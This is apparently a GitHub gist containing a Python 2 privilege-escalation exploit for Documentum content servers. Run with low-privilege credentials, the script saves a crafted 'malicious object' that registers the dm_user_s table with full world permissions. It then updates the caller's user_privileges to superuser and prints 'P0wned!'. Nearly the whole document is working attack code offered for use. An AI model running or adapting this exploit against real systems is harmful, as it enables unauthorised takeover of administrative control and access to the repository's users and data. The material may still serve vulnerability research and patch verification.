Created
March 22, 2017 09:21
-
-
Save andreybpanfilov/d8792484e13971982c0719ae59ab8c7c to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import socket | |
import sys | |
from os.path import basename | |
from dctmpy.docbaseclient import DocbaseClient | |
from dctmpy.obj.typedobject import TypedObject | |
CIPHERS = "ALL:aNULL:!eNULL" | |
def usage(): | |
print "usage:\n\t%s host port user password" % basename(sys.argv[0]) | |
def main(): | |
if len(sys.argv) != 5: | |
usage() | |
exit(1) | |
print "Trying to connect to %s:%s as %s ..." % (sys.argv[1], sys.argv[2], sys.argv[3]) | |
(session, docbase) = create_session(*sys.argv[1:5]) | |
if is_super_user(session): | |
print "Current user is a superuser, nothing to do" | |
exit(1) | |
print "Acquiring ID for malicious object ..." | |
id = session.next_id(25) | |
print "Acquired %s\nTrying to create following malicious object:" % id | |
obj = TypedObject(session=session) | |
obj.set_string("OBJECT_TYPE", "DM_REGISTERED") | |
obj.set_bool("IS_NEW_OBJECT", True) | |
obj.set_int("i_vstamp", 0) | |
obj.set_string("table_name", "dm_user_s") | |
obj.set_string("table_owner", docbase) | |
obj.set_string("owner_name", docbase) | |
obj.set_int("world_permit", 7) | |
obj.set_string("object_name", "dm_user_s") | |
obj.set_string("r_object_type", "dm_registered") | |
obj.set_int("owner_table_permit", 15) | |
obj.set_int("group_table_permit", 15) | |
obj.set_int("world_table_permit", 15) | |
print obj.dump() | |
r = session.sys_obj_save(id, obj) | |
if not r: | |
print "Failed" | |
exit(1) | |
print "Becoming superuser..." | |
r = session.query( | |
"UPDATE dm_dbo.dm_user_s SET user_privileges=16 " | |
"WHERE user_name=USER") \ | |
.next_record()['rows_updated'] | |
if r != 1: | |
print "Failed" | |
exit(1) | |
print "P0wned!" | |
def create_session(host, port, user, pwd, identity=None): | |
print "Trying to connect to %s:%s as %s ..." % \ | |
(host, port, user) | |
session = None | |
try: | |
session = DocbaseClient( | |
host=host, port=int(port), | |
username=user, password=pwd, | |
identity=identity) | |
except socket.error, e: | |
if e.errno == 54: | |
session = DocbaseClient( | |
host=host, port=int(port), | |
username=user, password=pwd, | |
identity=identity, | |
secure=True, ciphers=CIPHERS) | |
else: | |
raise e | |
docbase = session.docbaseconfig['object_name'] | |
version = session.serverconfig['r_server_version'] | |
print "Connected to %s:%s, docbase: %s, version: %s" % \ | |
(host, port, docbase, version) | |
return (session, docbase) | |
def is_super_user(session): | |
user = session.get_by_qualification( | |
"dm_user WHERE user_name=USER") | |
if user['user_privileges'] == 16: | |
return True | |
group = session.get_by_qualification( | |
"dm_group where group_name='dm_superusers' " | |
"AND any i_all_users_names=USER") | |
if group is not None: | |
return True | |
return False | |
if __name__ == '__main__': | |
main() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment